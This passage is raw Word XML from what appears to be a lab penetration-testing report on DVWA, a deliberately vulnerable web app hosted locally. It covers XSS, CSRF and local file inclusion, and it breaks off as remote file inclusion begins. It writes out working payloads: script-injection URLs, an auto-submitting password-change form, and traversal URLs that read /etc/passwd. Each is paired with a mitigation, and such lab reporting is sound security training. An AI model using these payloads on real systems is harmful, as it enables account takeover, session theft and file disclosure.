      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation: Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>At High security, DVWA sanitizes the message field (stripping/escaping script tags) before storing and rendering it, so the same payload is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> displayed as inert text rather than executed.</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 High (simplified): $message = strip_tags(addslashes($message));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Cross-Site Scripting (XSS) — Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C2410C"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the DVWA 'XSS (Reflected)' module reflects unsanitized input from a URL query parameter directly into the page response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA Security Level to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Submitted a normal name value to confir</w:t>
      </w:r>
      <w:r>
        <w:t>m the input is echoed back in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Injected a &lt;script&gt; payload directly into the 'name' input field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Copied the resulting crafted URL (containing the payload in the 'name' query parameter) and opened it directly in a new browser tab to prove the a</w:t>
      </w:r>
      <w:r>
        <w:t>ttack works purely via a malicious link, with no form interaction required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Repeated the same crafted URL against High security to confirm the payload is neutralised.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</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&lt;script&gt;alert('Reflected XSS')&lt;/script&gt;</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http://127.0.0.1/dvwa/vulnerabili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ties/xss_r/?name=&lt;script&gt;alert('Reflected+XSS')&lt;/script&gt;#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4952579" cy="4227342"/>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62756" cy="4236029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reflected XSS — crafted URL in address bar triggering alert directly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker can craft a malicious URL embedding a script payload and distribute it via email, chat, or a third-party website. Any authenticated victim who clicks the link has the script executed in their browser session, potentially leading to session thef</w:t>
      </w:r>
      <w:r>
        <w:t>t or unauthorized actions performed as that user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation: Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>At High security, DVWA applies str_replace-based filtering to strip '&lt;script&gt;' tags from the 'name' parameter before reflecting it back, so the injected markup is displayed as h</w:t>
      </w:r>
      <w:r>
        <w:t>armless literal text instead of being executed.</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 Low  (vulnerable): $name = $_GET['name'];</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 High (fixed): $name = str_replace('&lt;script&gt;', '', $_GET['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.2–3.3  XSS Mitigation — Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>n addition to DVWA's built-in input validation, a browser-level Content Security Policy header was added to Apache as a defence-in-depth control, so that even markup which bypasses server-side filteri</w:t>
      </w:r>
      <w:r>
        <w:t>ng cannot execute inline scripts.</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Header set Content-Security-Policy "default-src 'self'; script-src 'self'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C2410C"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the DVWA 'CSRF' password-change function can be triggered by a third-party page withou</w:t>
      </w:r>
      <w:r>
        <w:t>t the victim's explicit consent, and confirm that a session-bound token prevents this at High security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA Security Level to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Used the legitimate password-change form and observed that the request is submitted as a simple GET r</w:t>
      </w:r>
      <w:r>
        <w:t>equest with the new password values in the URL query string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Created a standalone malicious HTML page containing a hidden auto-submitting form pointing at DVWA's password-change endpoint, pre-filled with an attacker-chosen password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While authenticated to </w:t>
      </w:r>
      <w:r>
        <w:t>DVWA in the browser, opened the malicious page in a new tab, causing the password to change without any direct interaction with DVWA itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed the exploit by logging out and back in with the attacker-set password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Repeated the attack unmodified aga</w:t>
      </w:r>
      <w:r>
        <w:t>inst DVWA at High security and observed rejection due to an invalid CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</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 xml:space="preserve">&lt;form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/" method="GET"&gt;   &lt;input type="hidden" name="password_new" value="hacked123"&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="password_conf" value="hacked123"&gt;   &lt;input type="hidden" name="Change" value="Change"&gt; &lt;/form&gt; &lt;script&gt;document.forms[0].submit();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C" w:rsidP="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF1CDA7" wp14:editId="136B6ABE">
            <wp:extent cx="4950300" cy="3397348"/>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6921"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4975048" cy="3414332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C" w:rsidP="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CSRF — URL structure exposing password parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="39836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17183"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="3983603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CSRF — 'Password Changed' confirmation from forged request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker can silently change a logged-in victim'</w:t>
      </w:r>
      <w:r>
        <w:t>s password (or perform any other state-changing action the application exposes via predictable requests) simply by getting the victim to visit an attacker-controlled web page, without ever needing to know the victim's current credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation: Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-Based Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>At High security, DVWA embeds a unique, unpredictable 'user_token' value in the legitimate form and validates it against the user's server-side session on submission. Because the attacker's external page cannot read or guess this per-sess</w:t>
      </w:r>
      <w:r>
        <w:t>ion token (enforced by the browser's Same-Origin Policy), the forged request is rejected with a 'CSRF token is incorrect' error.</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 xml:space="preserve">// High (fixed): if (isset($_SESSION['session_token']) &amp;&amp; $_SESSION['session_token'] === $_GET['user_token']) {     // proceed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with password change } else {     echo "CSRF token is incorrect"; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005167E5" w:rsidRDefault="005167E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C2410C"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the DVWA 'File Inclusion' module's 'page' parameter allows arbitrary local files to be read from the server filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA Security Level to Low.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Observed the default 'page' parameter used to load included content (include.php).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Modified the 'page' parameter to point directly at /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Used directory traversal sequences (../../../../) to reach the file in case of relative path restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>At</w:t>
      </w:r>
      <w:r>
        <w:t>tempted to read DVWA's own configuration file to assess exposure of application credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload(s) Used</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http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/passwd</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http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="4810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810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="250"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LFI — /etc/passwd contents exposed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker can read arbitrary files accessible to the web server pr</w:t>
      </w:r>
      <w:r>
        <w:t>ocess, including system files (/etc/passwd) and, potentially, application configuration files containing database credentials — enabling further compromise of the server and connected systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>DVWA does not provide a dedicated High-s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ecurity LFI fix distinct from general input handling; industry-standard mitigation is to avoid passing user input directly into file-system functions, and instead use a fixed allow-list of permitted page identifiers mapped server-side to actual filenames, </w:t>
      </w:r>
      <w:r>
        <w:t>combined with disabling directory traversal characters and restricting the PHP process's filesystem permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F724C" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.6 Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Determine whether the same 'page' parameter can be made to fetch and execute PHP code hosted on a remote (attacker-controlled) server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:before="150" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed PHP's allow_url_include setting and temporarily enabled it for lab demonstration purposes.</w:t>
